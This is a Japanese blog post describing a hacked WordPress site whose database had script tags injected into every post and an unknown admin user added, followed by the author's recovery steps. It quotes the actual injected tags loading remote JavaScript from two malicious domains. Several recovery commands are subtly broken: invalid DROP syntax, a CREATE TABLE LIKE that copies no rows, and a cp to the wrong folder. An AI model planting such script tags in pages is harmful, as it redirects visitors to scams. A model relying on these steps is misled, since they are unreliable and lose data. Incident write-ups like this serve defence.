wordpressが乗っ取られた件

2020年08月05日

問題

(Apache2 + (mod_php) + mysql)

本サイトにアクセスすると、詐欺ページにリダイレクトされるようになっていた。 ↓この画面がリダイレクトされて出てきました。 ppimage wordpressを再インストールするも、治らない。

DBを調べてみると、至る所に<script src= 知らないurl></script>が入っていた。

DBのいじられた箇所

  • 全記事
  • 新しく勝手に作成された記事
  • 画像クリックした時に出るページにも(画像参照)

hackedwordpressphpmyadmin

  • wordpressの管理者ユーザーに見知らぬ名前が追加されている

発見前に最新版にアップデートしたと記憶しており、ゼロデイ攻撃にあったのだと思われる。

対応

  1. ファイルのバックアップを取る
  2. 新しくDBを作り、記事をコピー

wordpressを再インストールし、新しくDBを作成する(ここではdb2)

CREATE DATABASE db2;
  1. 新しくwordpressをインストールし、wordpress用のDBとしてdb2を選択する

  2. もとから入っている記事を削除

    DROP db2.wp_posts;
    
  3. 記事を修正

    DROP db2.wp_posts;
    CREATE table db2.wp_posts LIKE db1.wp_posts;
    

    記事に勝手に埋め込まれたURL等を一括で置換して削除する

    UPDATE db2.wp_posts SET post_content = REPLACE(post_content, '<script src=知らないURL></script>','');
    

    自分の場合は↓のSQLを実行した

    UPDATE db2.wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://scripts.trasnaltemyrecords.com/pixel.js?track=r&subid=043\' type=\'text/javascript\'></script><script src=\'https://clicks.worldctraffic.com/clizkes\' type=\'text/javascript\'></script>','');
    
  4. アップロードした画像や動画をコピー

    アップロードした画像や動画は wp-content/uploadsに入っている

    cp -rf バックアップ/wp-content/uploads/* wp-content/
    

感想

記事を全置換されなかっただけ、まだよかった。 Wordpressはもう使わないと思う。 結局サイトをGatsby + Contentful + Netlify に変えました。